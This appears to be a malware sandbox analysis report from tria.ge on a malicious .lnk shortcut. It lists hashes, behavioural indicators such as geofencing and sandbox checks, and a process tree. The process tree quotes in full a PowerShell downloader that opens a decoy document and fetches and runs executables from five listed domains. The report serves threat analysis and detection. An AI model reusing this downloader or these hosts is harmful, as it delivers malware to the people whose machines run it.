Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
03/05/2024, 11:07
Static task
static1
Behavioral task
behavioral1
Sample
105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
Resource
win10v2004-20240426-en
General
-
Target
105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk
-
Size
2KB
-
MD5
105e49bf1a9ac6a8f095ca1e9dfa5958
-
SHA1
ec9174ecb7de3a9ff2005dc726f4629e645d89d1
-
SHA256
18d77d07d2526660da13ca7c62925458360630a526b939f6eab32cc3233659a1
-
SHA512
194d0f1d6cb6f7069b5684f2a977134c3c8f82e29b3cd0d09f34213f1473f5a297e6593c3fb2775789038204203d1028ae47272d46ea3d929b01d9cdc498ac32
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 7 4068 powershell.exe 9 4068 powershell.exe 16 4068 powershell.exe 24 4068 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation cmd.exe -
pid Process 4068 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 2356 WINWORD.EXE 2356 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4068 powershell.exe 4068 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4068 powershell.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 2356 WINWORD.EXE 2356 WINWORD.EXE 2356 WINWORD.EXE 2356 WINWORD.EXE 2356 WINWORD.EXE 2356 WINWORD.EXE 2356 WINWORD.EXE 2356 WINWORD.EXE 2356 WINWORD.EXE 2356 WINWORD.EXE 2356 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1636 wrote to memory of 4068 1636 cmd.exe 83 PID 1636 wrote to memory of 4068 1636 cmd.exe 83 PID 4068 wrote to memory of 2356 4068 powershell.exe 87 PID 4068 wrote to memory of 2356 4068 powershell.exe 87
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\105e49bf1a9ac6a8f095ca1e9dfa5958_JaffaCakes118.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy ByPass -NoProfile -command function goe { return New-Object System.Net.WebClient; }; $rnd = New-Object System.Random; $ld = 0; $cs = [char]92; $fn = $env:temp+$cs; $ll = 'actual-clinic.ru','custommaidbooks.com','pinkcamille.com','locksmithtaunton.net','helpdeskng.com'; $dc = $fn+'a.doc'; $lk = $fn+'a.txt'; $y = goe; function g($f) { Start $f; }; $c = ''; if (!(Test-Path $dc)) { for ($i=0; $i -lt 2000; $i++) { $c = $c + [char]$rnd.Next(1,255); }; $c | Out-File -FilePath $dc; }; g($dc); if (!(Test-Path $lk)) { New-Item -Path $fn -Name 'a.txt' -ItemType File; for($n=1; $n -le 2; $n++) { $gop = '/counter/?TZWajRSsfqVvY6jmjdd_QLm_5Y3oJ6kfm3XxsQkTmKkZHf6ZWl0Ozg2PggWE7WOxbIY3mPYQ9s4L3iLQaEVBvAEo4B4'+$n; $f = $fn+'a'+$n+'.exe'; for($i=$ld; $i -lt $ll.length; $i++) { $u = $ll[$i] + $gop; $u = 'http://' + $u; $y.DownloadFile($u, $f); if (Test-Path $f) { $var = Get-Item $f; if ($var.length -gt 10000) { g($f); $ld=$i; break; }; }; }; }; };notepad.exe2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a.doc" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2356
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD566a7adfe485a3cb4263ed3675657ba14
SHA13af655818e958800f6473dd1170acf8420b58e5d
SHA25696ce457cecc6ae973f2adabd2481d3c2dabb5d5dfe2b7243461af5ae1056ecfb
SHA512627eca459216d05333775d47ed7c6a758712a375cd991977a2dfc13ef72e0d5ee17036979fedafd05d2fa2c37e93aaaf1c46097d1e3451001cf354ff7e013e49
-
Filesize
335KB
MD519a56801d8f2b5422b1b028de6656ab9
SHA1c3781062fe02b754a93a4d07b5ece5350aca527a
SHA2562ee17643f1626233992ff300fc8b35c8ef6fc557a9151479be4930e12b0272f1
SHA5120e7bb806b90b8ebc3ec3f1f2878936b4a7e0e64c3bd8c6d01711b167adb3511319567eb3958f5685c89fe59a21c5c36b86aef2b86482b760d92ab374872865df